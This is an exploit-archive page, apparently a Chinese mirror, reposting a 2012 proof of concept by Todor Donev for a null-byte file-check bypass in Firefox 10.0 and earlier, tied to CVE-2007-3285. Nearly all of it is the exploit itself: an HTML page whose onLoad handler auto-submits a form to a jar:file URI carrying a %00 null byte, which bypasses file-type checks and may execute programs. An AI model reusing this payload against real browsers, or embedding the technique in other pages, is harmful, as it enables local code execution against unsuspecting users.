mozilla firefox <= 10.0 local null byte bypass file check execution exploit
|
来源:todor.donev@@gmail.com 作者:Donev 发布时间:2012-02-09
|
|
<!-- [+] mozilla firefox <= 10.0 local null byte bypass file check execution exploit --> <!-- --> <!-- Vuln risk level: Medium --> <!-- Author: Todor Donev --> <!-- Author mail: todor.donev@@gmail.com --> <!-- --> <!-- Description: Allows local attackers to bypass file type checks and possibly execute programs via a jar: --> <!-- URI with a dangerous extension.--> <!-- See http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3285 for more --> <!-- --> <!-- Simple exploit for mozilla firefox 10.0, tested on Windows XP SP3 EN --> <!-- --> <!-- Greetz Tsvetelina Emirska again.. =) --> <!-- --> <html> <body onLoad=javascript:document.form.submit()> <form action="jar:file:///C:/Program%20Files/Mozilla%20Firefox/omni.ja!/components/browser.xpt%00.html"; method="GET" name="form"> </form> </body> </html> <!-- STOP ACTA !!! STOP PIPA !!! STOP SOPA -->
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|